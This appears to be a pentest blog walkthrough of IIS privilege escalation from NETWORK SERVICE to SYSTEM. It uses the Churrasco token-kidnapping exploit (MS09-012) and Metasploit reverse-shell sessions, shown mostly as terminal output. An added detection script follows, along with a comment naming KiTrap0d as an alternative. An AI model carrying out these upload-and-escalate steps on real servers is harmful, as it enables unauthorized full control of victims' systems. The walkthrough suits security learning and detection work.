http://www.argeniss.com/research.html
http://www.argeniss.com/research/TokenKidnapping.pdf
subsequently patched http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx
I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...
The gist is you can run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.
Let's see it in action.
We have our network service shell, push up our churrasco binary, metasploit payload, and run it.
*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.
[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)
Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > shell
Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E
Directory of C:\Inetpub\wwwroot
05/10/2010 06:53 AM <DIR> .
05/10/2010 06:53 AM <DIR> ..
05/10/2010 06:53 AM 410,624 Churrasco.bin
02/21/2003 06:48 PM 1,433 iisstart.htm
05/10/2010 07:19 AM 37,888 shell.bin
05/10/2010 07:43 AM 173 test4.asp;.txt
4 File(s) 2,105,685 bytes
2 Dir(s) 36,227,641,344 bytes free
C:\Inetpub\wwwroot>Churrasco.bin shell.bin
On the multi/handler side...
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM
[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)
(C) Copyright 1985-2003 Microsoft Corp.
C:\Inetpub\wwwroot>whoami
whoami
nt authority\system
C:\Inetpub\wwwroot>^Z
Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell Microsoft Windows [Version 5.2.3790] 192.168.6.94:443 -> 192.168.6.94:62854
2 meterpreter NT AUTHORITY\SYSTEM @ LAB 192.168.6.94:443 -> 192.168.6.94:62855
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
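A defender-side check for the pattern this walkthrough produces (an added example, not part of the original post or of any tool it mentions): it scans process-creation records for a SYSTEM process whose parent runs as NETWORK SERVICE or LOCAL SERVICE, and for images launched from the web root. The record layout, the PIDs and the C:\Inetpub web-root prefix are constructed assumptions.

```python
# Added example: every record below is constructed; the tuple layout is hypothetical.
SERVICE_ACCOUNTS = {r"NT AUTHORITY\NETWORK SERVICE", r"NT AUTHORITY\LOCAL SERVICE"}
SYSTEM = r"NT AUTHORITY\SYSTEM"
NS = r"NT AUTHORITY\NETWORK SERVICE"
WEB_ROOTS = ("c:\\inetpub\\",)  # assumed web content location, lower-case

SAMPLE_EVENTS = [  # (pid, ppid, user, image), oldest first
    (500, 4, SYSTEM, r"C:\WINDOWS\system32\services.exe"),
    (4100, 500, SYSTEM, r"C:\WINDOWS\system32\svchost.exe"),
    (3000, 900, NS, r"C:\WINDOWS\system32\inetsrv\w3wp.exe"),
    (3872, 3000, NS, r"C:\WINDOWS\system32\cmd.exe"),
    (4010, 3872, NS, r"C:\Inetpub\wwwroot\Churrasco.bin"),
    (4044, 4010, SYSTEM, r"C:\Inetpub\wwwroot\shell.bin"),
]

def lineage(procs, pid):
    """Image names from the oldest known ancestor down to pid."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:  # 'seen' guards against PID-reuse loops
        seen.add(pid)
        ppid, _user, image = procs[pid]
        chain.append(image.rsplit("\\", 1)[-1])
        pid = ppid
    return chain[::-1]

def find_suspicious(events):
    """Flag privilege jumps across a parent/child edge and execution from the web root."""
    procs, findings = {}, []
    for pid, ppid, user, image in events:
        reasons = []
        parent = procs.get(ppid)  # (ppid, user, image) of the parent, if seen
        if parent and parent[1] in SERVICE_ACCOUNTS and user == SYSTEM:
            reasons.append("SYSTEM child of service-account parent")
        low = image.lower()
        if low.startswith(WEB_ROOTS):
            reasons.append("image runs from web content directory")
            if not low.endswith((".exe", ".com")):
                reasons.append("no executable file extension")
        procs[pid] = (ppid, user, image)
        if reasons:
            findings.append({"pid": pid, "reasons": reasons,
                             "lineage": lineage(procs, pid)})
    return findings

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f["pid"], " > ".join(f["lineage"]), "|", "; ".join(f["reasons"]))
```

Records must be fed oldest first so the parent is already in the table when its child arrives; a child whose parent was never seen is still checked against the web-root rules.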
1 comment:
jduck brought up a good point that if a box is vuln to ms09-012 then it's also vuln to KiTrap0d and you can just go that route without uploading anything special.